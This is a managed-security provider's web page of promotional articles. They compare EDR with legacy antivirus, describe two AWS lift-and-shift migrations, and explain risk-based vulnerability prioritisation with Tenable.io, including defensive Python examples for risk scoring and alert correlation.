At Exabytes, we are committed to being your One-Stop Cloud Solutions & Cybersecurity Managed Services Provider.
Our offerings include:
☁️ eCloud – End-to-End Cloud Modernisation
🔐 eSecure – Advanced Threat Protection
💾 eBackup & DR – Enterprise Backup & Disaster Recovery
⚙️ eCloudApp – Smart Business Applications & AI-Driven Tools
We look forward to supporting Singapore enterprises in building a smarter, more secure, and innovation-driven future.
For more information, visit https://www.exabytes.sg/enterprise

SentinelOne vs Traditional Antivirus: ROI for Enterprise SOCs


AI-powered EDR vs. legacy AV — what delivers better outcomes for modern SOCs and ISO 27001 programs.

As cyber threats grow more complex, Security Operations Centers (SOCs) must rethink legacy defenses. Traditional antivirus (AV) solutions, once considered essential, now struggle to keep pace with modern threats like fileless malware, living-off-the-land attacks, and zero-day exploits. In contrast, Endpoint Detection and Response (EDR) tools like SentinelOne offer real-time threat detection, autonomous remediation, and actionable telemetry.

This article compares SentinelOne to traditional antivirus from a return on investment (ROI) perspective and highlights why next-generation endpoint protection is indispensable for enterprise SOCs — particularly in ISO 27001-certified environments like ours.

Traditional Antivirus: Legacy Protection with Limited Context

Traditional antivirus operates on:

  • Signature-based detection
  • Regular definition updates
  • Scheduled scans

While these methods work against known malware, they fail against:

  • Zero-day exploits
  • Polymorphic malware
  • Advanced Persistent Threats (APTs)
  • Fileless attacks

Moreover, traditional AV lacks behavioral analytics, making it ineffective for detecting sophisticated lateral movement or command-and-control (C2) activity.

SentinelOne: AI-Powered Autonomous Endpoint Security

SentinelOne uses an AI-driven engine to analyze file and process behaviors pre-execution, during execution, and post-execution. It operates in multiple modes:

  • EDR: Real-time detection, response, and investigation
  • NGAV (Next-Gen AV): Signature-less malware blocking
  • XDR Ready: Feeds telemetry to Stellar Cyber or other SIEM/XDR platforms
  • Rollback Remediation: Reverts ransomware changes on Windows endpoints

Unlike traditional AV, SentinelOne protects endpoints offline, without signatures, and with automated containment and remediation — minimizing analyst fatigue and dwell time.

ROI Comparison: SentinelOne vs Traditional AV

Category                                | Traditional Antivirus    | SentinelOne EDR
----------------------------------------+--------------------------+-------------------------------
Detection Capabilities                  | Signature-based only     | AI/behavioral + signatureless
Zero-Day Coverage                       | Low                      | High
Fileless Malware Defense                | No                       | Yes
Automated Remediation                   | No                       | Yes
SOC Integration (SIEM/XDR)              | Minimal                  | Native
Mean Time to Detect (MTTD)              | Days or weeks            | Seconds to minutes
Manual Triage Required                  | High                     | Low
Ransomware Rollback                     | No                       | Yes
Compliance Mapping (ISO 27001 A.12.2.1) | Partial                  | Full with evidence logging
Cost of Breach Response                 | High (due to dwell time) | Lower (automated isolation)

Operational Benefits in an ISO 27001 Environment

As part of an ISO 27001-certified cybersecurity department, using SentinelOne helps meet Annex A controls such as:

  • A.12.2.1: Controls against malware
  • A.16.1.5: Response to information security incidents
  • A.18.1.3: Protection of records and log integrity

SentinelOne provides auditable logs, incident timelines, and forensic details, which can be crucial during internal or certification audits.

Stellar Cyber & SentinelOne: The XDR Advantage

By integrating SentinelOne with Stellar Cyber, our SOC benefits from:

  • Centralized threat correlation
  • Real-time threat hunting
  • Attack path mapping
  • Unified response orchestration

For example, if SentinelOne detects anomalous PowerShell usage, Stellar Cyber can correlate that with lateral movement indicators and elevate it as a prioritized alert — reducing false positives and alert fatigue.

Final Thoughts

The reality for enterprise SOCs is clear: traditional antivirus can no longer keep pace with today’s adversaries. While legacy AV may seem cost-effective on paper, its inability to stop zero-day exploits, fileless attacks, and advanced persistent threats creates hidden costs in remediation, downtime, and compliance risk.

SentinelOne shifts this equation. By combining AI-driven detection, autonomous remediation, and actionable telemetry, it delivers not only stronger protection but measurable ROI through faster containment, reduced analyst workload, and improved compliance alignment with ISO 27001.

For organizations serious about operational resilience, the decision isn’t simply about upgrading endpoint security — it’s about future-proofing the SOC against evolving threats while maximizing security investments.

References

  • SentinelOne. (2025). Why Legacy Antivirus Fails and What Modern EDR Offers. sentinelone.com
  • Gartner. (2025). Market Guide for Endpoint Detection and Response Solutions. gartner.com
  • Stellar Cyber. (2024). Unified SOC Visibility with SentinelOne Integration. stellarcyber.ai
  • International Organization for Standardization. (2022). ISO/IEC 27001:2022 Information Security Management. iso.org
  • MITRE ATT&CK. (2024). Evaluating EDR Products Using ATT&CK Framework. attack.mitre.org

 

A Lift-and-Shift Approach: How E-Global Solved Its Scalability and Cost Efficiency Challenges with AWS

E-Global – Who Are They?

E-Global is a leading provider of Security Operations Center-as-a-Service (SOCaaS), acting as a trusted outsourced partner for organisations that require around-the-clock cybersecurity protection. Their team continuously monitors their clients’ networks, detects threats, and responds to incidents in real time, ensuring businesses stay secure without having to build their own in-house SOC. To power this service, E-Global had been running their on-premise Security Operations Center (SOC) on the Stellar Cyber platform. While this setup had supported their operations, it also introduced challenges in scalability, resiliency, and long-term cost efficiency.

The Beginning

To strengthen their service delivery and future-proof their SOCaaS offering, E-Global set a clear objective: migrate their on-premise Stellar Cyber platform to AWS. Their vision was to use a lift-and-shift approach, executing the migration in a single wave to reduce complexity and downtime. The migration plan included transferring 21 workloads across three core components of their SOC environment. This involved backing up critical security data to Amazon S3, launching new Amazon EC2 instances to host workloads, and then restoring and loading data from S3 into the AWS environment.

The Digital Transformation Journey

By leveraging AWS’s reliable and secure cloud infrastructure, E-Global was able to recreate their SOC platform in the cloud with minimal disruption to operations. The workloads were moved seamlessly from on-premise to AWS, taking advantage of EC2’s flexible compute capabilities to run Stellar Cyber efficiently. At the same time, Amazon S3 provided a durable, cost-effective solution for storing and retrieving large volumes of threat intelligence data, logs, and backup files.
The lift-and-shift execution ensured that E-Global’s SOC team could continue delivering uninterrupted monitoring and threat detection for their clients during the migration process. With AWS, they were able to quickly provision resources, reduce operational overhead, and establish a more resilient foundation for their SOCaaS business.

Outcomes and Business Value

Post-migration, E-Global achieved several key benefits:
  • Improved Scalability – AWS EC2 instances allowed them to right-size and scale resources on demand, ensuring their SOC platform can keep pace with E-Global’s growth and increasing security data volumes.
  • Increased Resiliency – With workloads distributed across AWS Availability Zones, the SOC platform gained built-in fault tolerance, enhancing reliability for mission-critical security operations.
  • Cost Optimisation – By adopting AWS’s pay-as-you-go model, E-Global gained better cost control, eliminating the need for heavy upfront hardware investments.
  • Stronger Data Protection – Amazon S3 ensured durable, secure, and compliant storage of sensitive threat intelligence and monitoring data.

The Value of an AWS Partner in Enabling SOC-as-a-Service

For E-Global’s SOC-as-a-Service (SOCaaS) offering, the ability to deliver continuous monitoring, rapid threat detection, and swift incident response is critical. In this case, E-Global was operating their on-premise Security Operations Center (SOC) leveraging the Stellar Cyber platform. While their existing setup provided the foundation for delivering outsourced SOC services, they sought to enhance scalability, resiliency, and cost-efficiency by exploring AWS.
Exabytes played a key role in bridging this transition. By assessing E-Global’s existing on-premise SOC architecture and mapping it to the right AWS services, Exabytes ensured the environment could scale to meet growing demand while maintaining stringent security and compliance standards. Exabytes provided guidance on how AWS could enhance the Stellar Cyber platform deployment—leveraging services like Amazon EC2 for compute flexibility, Amazon S3 for secure storage of logs and threat intelligence data, and Amazon CloudWatch for monitoring and alerting.
Beyond the technical migration, Exabytes added value by implementing AWS security best practices, ensuring workloads were protected through proper identity management, network segmentation, and encryption. They also provided cost optimisation strategies, making sure E-Global could run a high-performance SOCaaS offering without unnecessary spend.
By working with Exabytes, E-Global gained more than a migration pathway—they gained a strategic advisor who helped them modernise their SOC delivery model, ensuring they could provide their end customers with faster, more reliable, and more secure threat detection and response, all powered by AWS.

Looking Ahead

By moving their SOC-as-a-Service platform from on-premise to AWS, E-Global not only modernised their IT environment but also positioned themselves for future innovation in cybersecurity delivery. With a scalable, resilient, and cost-effective SOC running on AWS, they are now better equipped to meet the growing demand for outsourced security operations and deliver even greater value to their clients.

From Legacy Hosting to AWS: Bloyalty’s Tips and Learnings

BLoyalty Sdn Bhd, a wholly-owned subsidiary of Berjaya Corporation Berhad, owns and manages the loyalty program known as B Infinite (formerly BCard). Aimed at promoting loyalty, B Infinite is Malaysia’s lifestyle and brand-focused reward program, partnering with merchants from various industries and businesses to offer their members unparalleled value for their lifestyle choices.

What is B Infinite?

BCard was launched to the public in Klang Valley on 15 December 2010 and subsequently nationwide on 30 September 2011. In July 2016, BCard was officially rebranded as B Infinite. Today, B Infinite (Formerly BCard) has a network of more than 130 merchant partners, over 4,000 stores nationwide.

Known as the “Card that Keeps On Giving,” B Infinite constantly proposes a win-win situation for both Bloyalty and businesses. In this spirit of innovation, B Infinite creates a world of diverse choices using fast-paced and near-limitless digital and mobile platforms. The possibilities are now infinite.

B Infinite’s Digital Transformation Journey

Bloyalty initiated a digital transformation journey due to challenges in accessing their previous IT environment, which had become outdated, costly to maintain, and lacked visibility. Their legacy infrastructure — hosted on-premises and partially managed by a third-party provider — was no longer scalable or reliable, and they faced frequent delays in accessing critical systems and data.

Recognising the need for better agility and long-term cost savings, Bloyalty made the strategic decision to migrate to AWS. By leveraging AWS’s scalable cloud services, the organisation aimed to:
  • Regain control over their IT environment
  • Optimise operational costs by eliminating hardware dependencies and reducing licensing and maintenance expenses
  • Modernise their workloads, enabling faster deployment and easier management
  • Enhance resilience and accessibility, ensuring systems are reliably available from anywhere

Migration Approach: From Legacy Hosting to AWS

When planning a cloud migration, one of the most effective strategies to minimise disruption and accelerate time-to-value is the lift-and-shift approach. For Bloyalty, Exabytes recommended migrating their workloads from their previous hosting environment to Amazon Web Services (AWS) using two proven migration tools: AWS MGN (Application Migration Service) and RiverMeadow. These tools enabled a seamless transition of their applications and data into the AWS cloud while ensuring business continuity throughout the migration process.

By leveraging these migration tools, Bloyalty’s workloads were successfully transitioned into Amazon Elastic Compute Cloud (EC2). The newly built AWS environment was carefully designed to deliver high availability and scalability, ensuring that Bloyalty could easily adjust resources based on demand. Beyond just performance, the move to AWS also allowed them to achieve a more cost-effective operating model—reducing unnecessary overheads while still meeting, and in some cases exceeding, their original performance benchmarks.

Why Amazon EC2 is the Right Choice

One of the key reasons behind the success of this migration was the use of Amazon EC2, AWS’s highly flexible compute service. EC2 provides a wide range of instance types, sizes, and pricing options, giving businesses the freedom to right-size resources for each specific workload. Whether running high-performance databases, web applications, or background processing tasks, EC2 offers the right configuration to balance performance and cost.

In addition, EC2’s auto-scaling capabilities allow applications to automatically adjust to traffic patterns—scaling up during peak demand and scaling down during quieter periods. This not only improves system responsiveness but also optimises costs by ensuring Bloyalty only pays for what they use. The service is further enhanced by integrations with other AWS services such as Amazon S3 for storage, Amazon RDS for managed databases, and Amazon CloudWatch for monitoring, creating a holistic and future-ready infrastructure.

From a business perspective, EC2 also offers the flexibility of pricing models—including On-Demand, Reserved Instances, and Spot Instances—giving Bloyalty the ability to optimise their spend according to usage patterns. For organisations that prioritise resiliency and continuity, EC2 instances can be deployed across multiple Availability Zones (AZs), ensuring workloads remain operational even if one AZ experiences an outage.

Driving Business Value with AWS

The migration to AWS EC2 ultimately enabled Bloyalty to modernise their IT environment without having to re-architect applications immediately. This approach gave them the flexibility to stabilise operations in the cloud first, while opening the door to future innovations such as containerisation, serverless computing, and advanced data analytics. By moving to EC2, they now benefit from a platform that is reliable, secure, scalable, and cost-efficient, positioning them strongly for both current and future business needs.

The Value of an AWS Partner

A successful migration is not just about moving workloads from one environment to another—it’s about ensuring that the new cloud environment is built to support long-term business goals. This is where the expertise of an AWS Partner brings tremendous value. As a trusted advisor, Exabytes guided Bloyalty through the entire migration process, from initial assessment and planning, to the actual lift-and-shift execution, and finally to post-migration optimisation.

Exabytes ensured that the AWS environment was designed following best practices in performance, security, and cost management, providing Bloyalty with a resilient, future-ready foundation. Beyond the technical execution, Exabytes also helped Bloyalty navigate migration tools like AWS MGN and RiverMeadow, ensuring the right approach was used for each workload. Post-migration, Exabytes provided knowledge transfer and enablement, empowering Bloyalty’s team to operate confidently within AWS.

By working with Exabytes, Bloyalty didn’t just achieve a smooth transition to EC2—they also gained a strategic advantage, with a cloud environment optimised for scalability, cost-efficiency, and innovation. The ongoing support and guidance from Exabytes ensures that Bloyalty can continue to unlock more value from AWS services as their business evolves.

Continuous Vulnerability Scanning with Tenable.io: Going Beyond CVSS


In the ever-evolving threat landscape of 2025, vulnerability management is no longer about simply detecting Common Vulnerabilities and Exposures (CVEs) and assigning CVSS scores. Organizations need continuous visibility, contextual prioritization, and intelligent response mechanisms to defend against fast-moving exploits. That’s where Tenable.io steps in — enabling not just traditional scanning, but continuous, risk-based vulnerability management (VRM).
This article explores how Tenable.io redefines vulnerability scanning beyond CVSS, its integration with platforms like Stellar Cyber, and how security teams can operationalize findings in real-time.

Why CVSS Alone Isn’t Enough

CVSS (Common Vulnerability Scoring System) has been the industry standard for evaluating vulnerabilities. However, in practice, CVSS has key limitations:
  • It’s static: Scores don’t adapt to your specific environment.
  • Lacks exploitability context: A high CVSS score doesn’t mean active exploitation.
  • Ignores asset value: It treats all systems as equally critical.
According to Tenable (2024), over 55% of high-CVSS vulnerabilities are not exploitable in the wild, yet many organizations still prioritize them over actual threats.

What Is Continuous Vulnerability Management?

Unlike scheduled monthly scans, continuous vulnerability scanning is about real-time asset discovery and ongoing assessment. Tenable.io’s cloud-native platform:
  • Monitors assets as they are spun up or modified
  • Scans without manual triggers
  • Uses passive and active techniques to stay updated
  • Integrates with cloud environments (AWS, Azure, GCP) and containers
This eliminates visibility gaps between scan windows, making it ideal for modern hybrid environments.

Going Beyond CVSS: Tenable.io’s Risk-Based Approach

Tenable.io uses Vulnerability Priority Rating (VPR), which includes:
  • Threat intelligence: Active exploitation in the wild, malware associations
  • Asset criticality: Importance based on role and exposure
  • Temporal risk: Changes over time as threats emerge or fade
This allows SOC and GRC teams to prioritize real risks, not just theoretical ones.
For example:
  • CVSS 9.8 vulnerability with no known exploit → Low VPR
  • CVSS 7.0 vulnerability actively targeted in ransomware campaigns → High VPR
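The reordering described in the two bullets above, as an added example (this is not Tenable's VPR formula or code from the article; the weights, the asset criticality scale, the 30-day temporal ramp and the sample findings are all assumptions chosen to illustrate the idea). It scores each finding by scaling the CVSS base score with threat intelligence, asset criticality and time exposed, then shows how the CVSS-only ordering and the risk-based ordering differ for the same three findings:

```python
from dataclasses import dataclass
from datetime import date

# Constructed sample data. Vulnerability identifiers are placeholders, not real CVE numbers.
TODAY = date(2025, 6, 1)


@dataclass(frozen=True)
class Finding:
    vuln_id: str
    asset: str
    cvss: float              # CVSS base score, 0.0-10.0
    exploited_in_wild: bool  # threat intel: public exploitation observed
    malware_linked: bool     # threat intel: used by a malware/ransomware campaign
    asset_criticality: int   # assumed scale: 1 (lab host) .. 5 (internet-facing, business-critical)
    first_seen: date         # when the scanner first reported the finding


SAMPLE_FINDINGS = [
    Finding("VULN-A", "lab-build-03", 9.8, False, False, 2, date(2025, 5, 30)),
    Finding("VULN-B", "web-gw-01",    7.0, True,  True,  5, date(2025, 5, 2)),
    Finding("VULN-C", "app-07",       8.1, True,  False, 3, date(2025, 5, 22)),
]


def risk_score(f: Finding, today: date = TODAY) -> float:
    """Illustrative risk-based priority: the CVSS base score scaled by threat
    intelligence, asset criticality and a temporal factor. A simplified model
    built for this example, not Tenable's VPR algorithm."""
    threat = 0.3                  # no known exploit: mostly theoretical risk
    if f.exploited_in_wild:
        threat = 0.8
    if f.malware_linked:
        threat = 1.0              # actively weaponised: full weight
    asset = f.asset_criticality / 5.0
    # Temporal factor: exposure accumulates the longer the finding stays open;
    # ramps from 0.8 on day zero to 1.0 after 30 days.
    age_days = max(0, (today - f.first_seen).days)
    temporal = 0.8 + 0.2 * min(age_days, 30) / 30
    return round(f.cvss * threat * asset * temporal, 2)


def prioritize_by_cvss(findings):
    """CVSS-only ordering: highest base score first."""
    return [f.vuln_id for f in sorted(findings, key=lambda f: f.cvss, reverse=True)]


def prioritize_by_risk(findings, today: date = TODAY):
    """Risk-based ordering: highest contextual score first."""
    return [f.vuln_id for f in sorted(findings, key=lambda f: risk_score(f, today), reverse=True)]


if __name__ == "__main__":
    for f in SAMPLE_FINDINGS:
        print(f"{f.vuln_id} on {f.asset}: CVSS {f.cvss} -> risk {risk_score(f)}")
    print("CVSS-only order: ", prioritize_by_cvss(SAMPLE_FINDINGS))
    print("Risk-based order:", prioritize_by_risk(SAMPLE_FINDINGS))
```

With these inputs the CVSS-only queue puts the unexploited 9.8 on a lab host first, while the risk-based queue moves the actively targeted 7.0 on the internet-facing gateway to the top; the point is that the ordering, not the raw score, is what a patch team acts on.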

Integration with Stellar Cyber: Incident-Driven Response

By feeding Tenable.io data into Stellar Cyber’s Open XDR platform, vulnerabilities are correlated with:
  • SIEM alerts
  • EDR findings from SentinelOne
  • User and network behavior
This creates attack path visualizations, showing how an attacker might exploit a weak point and move laterally — enabling preventive actions before damage occurs.
Example workflow:
  1. Tenable.io detects outdated Apache on a web server.
  2. Stellar Cyber correlates with failed RDP login attempts from foreign IPs.
  3. An incident is generated with high confidence and risk score.
  4. SOC automatically isolates the asset or flags for immediate patching.
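The four-step workflow above, as an added example of the correlation logic a SOC platform performs (this is not Stellar Cyber's or Tenable's code; the log format, the corporate address range, the thresholds and the scoring weights are assumptions, and the findings and log lines are constructed). It pairs a scanner finding with failed logins from outside corporate ranges on the same asset, produces an incident with a risk score and confidence, and decides between isolation and a patch flag. The same shape applies to the SentinelOne and Stellar Cyber example in the earlier article: swap the scanner finding for an EDR alert and the login failures for lateral-movement indicators.

```python
import ipaddress
from collections import defaultdict

# Constructed scanner output: asset, plugin description, risk rating, internet exposure.
VULN_FINDINGS = [
    {"asset": "web-01", "plugin": "Apache HTTP Server outdated", "vpr": 7.4, "internet_facing": True},
    {"asset": "db-02",  "plugin": "OpenSSL end-of-life",         "vpr": 6.1, "internet_facing": False},
]

# Constructed authentication events in a simplified syslog-like layout (assumed format).
AUTH_LOG = """\
2025-06-01T02:14:07Z web-01 rdp login=FAILED user=administrator src=203.0.113.45
2025-06-01T02:14:09Z web-01 rdp login=FAILED user=administrator src=203.0.113.45
2025-06-01T02:14:11Z web-01 rdp login=FAILED user=admin src=198.51.100.7
2025-06-01T02:14:12Z web-01 rdp login=FAILED user=backup src=203.0.113.45
2025-06-01T02:14:20Z web-01 rdp login=FAILED user=svc_iis src=198.51.100.7
2025-06-01T03:01:00Z db-02 rdp login=FAILED user=dba src=10.0.5.12
2025-06-01T03:05:00Z db-02 rdp login=SUCCESS user=dba src=10.0.5.12
"""

# Assumed corporate address space; any source outside it counts as "foreign".
CORPORATE_NETS = [ipaddress.ip_network("10.0.0.0/8")]
FAILED_LOGIN_THRESHOLD = 3   # external failures needed before the finding is correlated
ISOLATE_THRESHOLD = 8.0      # risk at or above this triggers automatic isolation


def parse_auth_line(line: str) -> dict:
    """Split 'timestamp host proto key=value ...' into a dict."""
    ts, host, proto, *pairs = line.split()
    fields = dict(p.split("=", 1) for p in pairs)
    return {"ts": ts, "asset": host, "proto": proto, **fields}


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in CORPORATE_NETS)


def external_failed_logins(log_text: str) -> dict:
    """Count failed logins per asset that originate outside corporate ranges."""
    counts = defaultdict(int)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_auth_line(line)
        if ev.get("login") == "FAILED" and is_external(ev["src"]):
            counts[ev["asset"]] += 1
    return dict(counts)


def correlate(findings, log_text: str) -> list:
    """Raise an incident only when a vulnerable asset also shows hostile login activity."""
    failed = external_failed_logins(log_text)
    incidents = []
    for f in findings:
        attempts = failed.get(f["asset"], 0)
        if attempts < FAILED_LOGIN_THRESHOLD:
            continue  # the finding alone stays a patch ticket, not an incident
        # Risk: scanner rating, raised for internet exposure and attempt volume, capped at 10.
        raw = f["vpr"] + (1.5 if f["internet_facing"] else 0.0) + min(attempts, 10) * 0.2
        risk = round(min(10.0, raw), 1)
        confidence = "high" if f["internet_facing"] else "medium"
        action = "isolate" if risk >= ISOLATE_THRESHOLD else "flag_for_patching"
        incidents.append({"asset": f["asset"], "vulnerability": f["plugin"],
                          "failed_external_logins": attempts, "risk": risk,
                          "confidence": confidence, "action": action})
    return incidents


if __name__ == "__main__":
    for inc in correlate(VULN_FINDINGS, AUTH_LOG):
        print(inc)
```

Note the negative case: db-02 also has a finding and a failed login, but the attempt came from the corporate range and never reached the threshold, so it is left for the normal patch cycle rather than inflating the SOC queue.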

Benefits of Continuous VRM with Tenable.io

Feature           | Traditional Scanning | Tenable.io (Continuous VRM)
------------------+----------------------+------------------------------------------
Scan Frequency    | Monthly or quarterly | Real-time and continuous
Prioritization    | CVSS-based           | Risk and exploit-based
Asset Coverage    | Static and manual    | Dynamic discovery
Context Awareness | Low                  | High (via integrations and threat intel)
Remediation Speed | Delayed              | Streamlined with automation

Best Practices for Effective Use

  1. Automate asset tagging: Use CMDB and cloud tags to classify systems by criticality.
  2. Integrate with patch management tools: Auto-deploy patches based on VPR risk.
  3. Cross-correlate with SIEM: Use Stellar Cyber to add detection and behavioral context.
  4. Regularly review exemptions: Ensure justifications are still valid for unpatched assets.
  5. Use dashboards for compliance: Map vulnerabilities to ISO 27001 Annex A controls (e.g., A.12.6.1 – Technical Vulnerability Management).

Real-World Impact

A 2025 study by Gartner revealed organizations that implemented Tenable.io with risk-based prioritization reduced time-to-remediate critical vulnerabilities by 60% and improved audit readiness for ISO 27001 and NIST CSF frameworks.
At Exabytes, integrating Tenable.io with Stellar Cyber and SentinelOne has enabled:
  • Automated attack path analysis
  • Prioritized patching workflows
  • Faster incident triage by the SOC team

Final Thoughts

Relying only on CVSS scores leaves blind spots that attackers can exploit. Continuous vulnerability scanning with Tenable.io, combined with Stellar Cyber and SentinelOne, empowers security teams to prioritize threats based on real-world risk and respond before damage is done.
Don’t wait for attackers to find the gaps you didn’t know existed. Start with Exabytes eSecure to see how we can help you operationalize risk-based vulnerability management and protect what matters most.

References

  • Tenable. (2024). Vulnerability Priority Rating (VPR) Explained. https://www.tenable.com/blog
  • Stellar Cyber. (2025). Unified Security Operations with Tenable.io Integration. https://www.stellarcyber.ai
  • NIST. (2023). Cybersecurity Framework 2.0. https://www.nist.gov
  • International Organization for Standardization. (2022). ISO/IEC 27001:2022 Information Security Management Systems. https://www.iso.org

Event & Activities
